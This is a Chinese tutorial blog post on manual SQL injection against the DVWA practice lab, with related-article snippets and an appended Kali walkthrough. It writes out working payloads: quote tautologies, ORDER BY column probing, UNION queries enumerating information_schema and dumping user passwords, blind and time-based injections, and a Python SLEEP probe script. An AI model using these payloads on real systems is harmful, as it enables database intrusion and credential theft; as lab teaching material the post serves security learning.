SQL注入简单版思路总结 (基于DVWA系统)

最新推荐文章于 2022-11-07 21:29:56 发布
原创 最新推荐文章于 2022-11-07 21:29:56 发布 · 494 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文总结了SQL注入的基础思路,通过DVWA系统进行演示。首先探测是否存在SQL注入,通过不同输入测试PHP处理方式。接着,确定表单字段数、数据库名,并利用`UNION`和`INFORMATION_SCHEMA`获取表名和字段信息。最后,通过已知字段名获取实际数据。

对于有提示,丝毫不加过滤的表单注入顺序如下:
一.探测是否有诸如点
常用的简单php处理语句有三类:
1.select *from … where id=’$input_data’
2.select *from … where id=$input_data
3. select *from … where id="$input_data"
对于这三种情况,需要输入三种数据进行探测
最常见的情况1,输入*1' or '1'='1*
情况2,输入*1 or 1=1*
情况3 ,输入1" or "1"="1

二.探测输入数据这个表单中的字段数
1' order by 3# #号用于注释掉后面的句子,order by的意思是将结果按什么顺序进行排序,这里可以用于探测字段数,如果该表单字段数不足3,会报错,以这种方式逐步探测该表单字段数

三.探测数据库名
利用union 函数探测数据库名

1' union select 1,2,database()#`在这里插入代码片`

这里select 1,2 完全是为了凑数,取决于该表拥有的字段数,在这里假设的是该表内有三个字段,则在第三个字段处用database()方式获得数据库名。

下列步骤要用到mysql中自带的一个包含结构信息的数据库information_schema

四.探测数据库
输入 1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#

来获取dvwa库中的表名,具体看下在这里插入图片描述
tables表单中存有的信息,table_schema内存的是所有数据库名,table_name内存有数据库内表单名,用这种方式筛选某库中有的表单信息。

五,已知目标表单名后获取字段名
基本方法依然是利用information_schema,这时候要用到另一个表单columns

1' union select 1,column_name from information_schema.columns where table_name='users'#

该表单字段如下在这里插入图片描述

六.已知字段名后获取各个字段的值(这一步已不再需要information_schema)
假设这里从users表里发现了userid,password字段。那么只需要一句sql语句就可以获得其中的值了

1' union select user,password from users#
DVWASQL注入
geejkse_seff的博客
07-30 450
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
DVWA靶场】Web安全之(布尔值/延时型)SQL盲注(超详细教程)
weixin_60838266的博客
07-25 1736
SQL注入是一种常见的网络安全漏洞,通过利用网站对用户输入数据的不完善检查和过滤,攻击者可以向数据库服务器发送恶意的SQL查询,从而获取敏感信息或者对数据库进行破坏。在本文中,通过Kali Linux对DVWASQL Injection模块展开了实验,并使用手工和burpsuite工具针对Low、Medium和High等级进行了布尔值/延时型的SQL盲注测试
12.DVWA练习平台的SQL注入总结-------小白笔记
qwsn
03-29 364
1.Low等级 ①无过滤 ②字符型 ③使用#来注释单引号 ④Get型注入 2.Medium等级 ①php函数转义字符过滤 ②使用burpsuite抓包拦截,注入语句,放行包 ③整型注入 ④Post型注入 3.High等级: ①使用limit限制 ②#过滤 ③无法使用sqlmap,因为无法再302重定向,因为新开一个页面进行输入查询 ④Session型注入 4.impossible等级 略 ...
DVWASQL注入考点小结
谢公子的博客
09-02 3217
SQL Injection SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。近期很火的大使馆接连被黑事件,据说黑客依靠的就是常见的SQL注入漏洞。 low: 这个等级主要考的是字符型注入。最...
DVWA SQL注入总结
iO快到碗里来
05-13 1371
DVWA SQL Injection 1.判断是否存在漏洞 输入1提交-回显用户信息 输入1‘提交-服务器报错:数据库为Mysql 2.判断POC方式 输入 1‘ or ‘1’=’1 回显所有用户信息 在这里我们可以使用union注入 查询字段数 1‘ order by 1-- ;1’ order by 10-- ;…(二分法) 最后确定为2 确定回显点 -1‘ union select 1,2 -- ; 最后确定为2 查询用户名和数据库名 -1’ union select user(),dat
DVWA 实验报告:8、SQL 注入 SQL Injection(Blind)
看那白熊
05-30 796
占位
SQL注入实验报告
fencecat的博客
12-31 1万+
实验项目 SQL注入 综合性实验 2020年9月25日 一、实验综述 1.实验目的及要求 创建VMWARE虚拟机 的Windows环境, 在虚拟机中安装phpstudy,并搭建DVWA环境,通过学习web工作原理与SQL注入工作原理,能够实现简单SQL注入验证。 2.实验仪器、设备或软件 Vmware DVWA phpStudy 3.实验原理 (1)Web工作原理: Web服务器的本质就是 接收数据 ⇒ HTTP解析 ⇒ 逻辑处理 ⇒ HTTP封包 ⇒ 发送数据。 Web服务器的工作流...
DVWA-WEB漏洞系列之SQL注入
woo233的博客
08-09 3840
用户输入数据为 1’ and 1=1#,这时SQL语句发生变化,在原有查询完成后会判断 1=1,如果判断正确则才会有输出[#作用是注释(移除)后续SQL语句]在用户输入中依次增加order by后面的数据,当在输入为 1’ order by 3#时网页出现报错,证明该数据库有2列/字段。攻击者在HTTP请求中注入恶意的SQL代码,服务器使用参数构建数据库SQL命令时,恶意SQL被一起构造,并在数据库中执行。防御SQL注入:使用PDO,配合正确的过滤和sql语句就可避免SQL注入漏洞的产生。...
dvwasql注入学习(不同级别)
热门推荐
过客璇璇的博客
03-24 4万+
dvwasql注入学习(不同级别) 级别:Low 从页面上看到,有一个可以提交查询内容的地方 我们可以通过以下步骤判断这里是否存在注入点 ① 输入1 提交 ②输入1' 提交 ③输入1 and 1=1提交 ④输入1 and 1=2提交 由上可以看出是存在注入点的, 我们猜测sql查询语句是这样的: select First name的列名 a...
Web漏洞分析(dvwaSQL手工注入sqlmap注入)
王陈锋的博客
11-07 4625
借助Web漏洞教学和演练的开源工具DVWA,学习并了解Web漏洞(以SQL注入为例)的原理及利用,验证SQL注入漏洞的实现过程及结果,并思考应对web漏洞风险的策略与手段。1、操作系统:windows 7/8/10等2、开发环境:DVWA
dvwa——sql注入
qq_45487671的博客
05-26 2741
SQL注入攻击实验 1.实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 2.实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL本号、安装路径等信息;最终爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 3.实验过程描述 1、判断是否存在SQL注入点。 id值输入1,发现正常显示 输入
DVWA(靶机)-----sql注入简单利用笔记
边城浪子的博客
11-01 445
关于DVWA的介绍网上太多。 实验环境: windows2003服务器(192.168.152.128) DVWA源码包 攻击过程: step1:打开浏览器,设代理 ,Burpsuite设代理 。 step2:抓包如图,保存为sql_low.txt。 网址:http://192.168.152.128/dvwa/vulnerabilities/sqli/ step3:使用sql...
2021-02-06
zhaodoudou1221的博客
02-06 479
**DVWA-SQL Injection ** SQL Injection SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 手工注入(非盲注)的步骤 1.判断是否存在注入注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显示的字段顺序 4.查数据库 5.查表 6.获取表中的字段名
DVWA系列---基于报错的SQL注入SQL Injection)
野原新之助
02-06 1373
文章目录1、Low2、Medium3、High
SQL注入攻击的简单示例
weixin_30888707的博客
05-22 361
SQL注入攻击的简单示例: statement := "SELECT * FROM Users WHERE Value= " + a_variable + " 上面这条语句是很普通的一条SQL语句,他主要实现的功能就是让用户输入一个员工编号然后查询处这个员工的信息。但是若这条语句被不法攻击者改装过后,就可能成为破坏数据的黑手。如攻击者在输入变量的时候,输...
DVWA-SQL 详细教学
cc菜的一批
12-05 4644
一、SQL注入原理 利用现有应用程序,将(恶意)SQL命令注入到后台数据库引擎执行的能力,这是SQL注入的标准释义。 二、手工注入思想流程 1、判断是否存在注入点 2、是数字型注入,还是字符型注入 3、判断字段数 4、判断回显位置 5、获取数据库名 6、获取表名 7、获取字段名 8、得到数据 三、开始手工sql注入 难度等级 注入方式 提交方式 low 字符型 get 尝试输...
DVWA-xss-impossible
王嘟嘟的博客
09-17 2409
0x00 前言 在网上没有看到对impossible xss进行绕过的,impossible的含义也是没有xss的意思,或者是还没有人发现这个impossible绕过方式,我们还是跟风,直接看一下代码。 0x01 学习 1.源码 这里使用了一个htmlspecialchars方法,这个方法在php里的意思就是把字符转换为实体,这样子的实体是没有办法进行注入的。 暂时我也不知道...
DVWAsqlmap post登录过注入
weixin_42859966的博客
09-22 1727
**利用sqlmap过DVWA渗透环境中的注入题** 一开始利用常规语句进行注入会发现注入不了,看了语句提示会重定向到登录框,所以要对post掉登录这个过程。 教程看下面链接 https://blog.youkuaiyun.com/u011781521/article/details/58594941 首先要利用burpsuite抓包后,将登录后然后...
kalilinux中进行dvwasql注入与绕过
最新发布
03-20
### Kali Linux 中针对 DVWASQL 注入攻击及绕过防御技术 #### 背景介绍 DVWA(Damn Vulnerable Web Application)是一个用于教育目的的漏洞练习平台,旨在帮助用户了解常见的Web应用安全漏洞及其利用方法。SQL注入是一种通过输入恶意SQL语句来操控数据库的行为,在低安全性配置下容易实现。 以下是关于如何在Kali Linux环境中对DVWA进行SQL注入攻击以及可能的绕过防御技巧: --- #### 一、基础环境准备 确保已安装并运行Kali Linux和DVWA服务。可以通过浏览器访问`http://<your-ip>/dvwa/`登录到DVWA界面,并设置目标难度为“Low”或更高以测试不同的防护机制[^1]。 --- #### 二、SQL Injection 攻击方式 ##### 1. **Union-Based SQL Injection** 当应用程序未正确过滤特殊字符时,可以尝试使用 `UNION SELECT` 构造查询字符串获取额外数据。 ```sql ' UNION ALL SELECT null, version(), database(); -- ``` 上述命令会返回MySQL本号和当前使用的数据库名称。 ##### 2. **Error-Based SQL Injection** 如果服务器启用了错误回显功能,则可通过触发异常提取敏感信息。例如: ```sql ' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users')>0 -- ``` 此脚本验证是否存在名为 “users”的表。 ##### 3. **Blind Boolean SQL Injection** 对于无反馈页面响应场景下的盲注,可采用布尔型判断逐步推导出隐藏字段的内容。比如逐位猜解密码hash值: ```sql ' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))=50;-- ``` 这里假设第一个用户的password首字母ASCII码等于50。 --- #### 三、绕过HTML转义函数htmlspecialchars() 尽管启用htmlspecialchars()能够显著提升XSS防范能力,但在某些特定条件下仍可能存在被规避的风险。例如,当开发者仅依赖默认参数调用该函数而忽略ENT_QUOTES标志时,单引号可能会保持原样从而允许执行嵌套JavaScript代码片段[^3]。 考虑如下情况: ```php <?php echo htmlspecialchars("<script>alert('test');</script>", ENT_NOQUOTES); ?> ``` 由于缺少ENT_QUOTES选项,“’”不会得到转换,因此潜在威胁依然存在。 另外需要注意的是,即使经过编码处理后的输出也可能因上下文差异再次解析成危险指令。所以建议综合运用多种手段加强整体安全性评估工作流程中的每一个环节都至关重要。 --- #### 四、高级Bypass Techniques Against Modern Defenses 随着现代框架引入ORM层抽象以及其他内置保护措施,传统手法往往难以奏效。此时需探索更多创新思路应对挑战: - 利用时间延迟特性实施基于时间轴上的逻辑推理(Time-based blind sql injection); - 结合其他类型的web漏洞(如文件上传缺陷)间接达成最终目的; - 针对具体业务逻辑设计定制化payloads等等. 总之,持续更新自己的知识体系紧跟最新趋势变化非常重要! --- ### 示例代码展示 下面给出一段简单的Python脚本来自动化探测过程: ```python import requests url = "http://target/dvwa/vulnerabilities/sqli/" data={'id':"' OR SLEEP(5)--",'Submit':'Submit'} response=requests.post(url,data=data) if response.elapsed.total_seconds()>4 : print("[+] Time Based Blind Sql Injection Detected!") else : print("[-] No vulnerability found.") ``` 以上程序发送POST请求给指定URL地址的同时附加精心构造的数据包(id字段),观察其耗时时长是否明显增加作为判定依据之一. ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值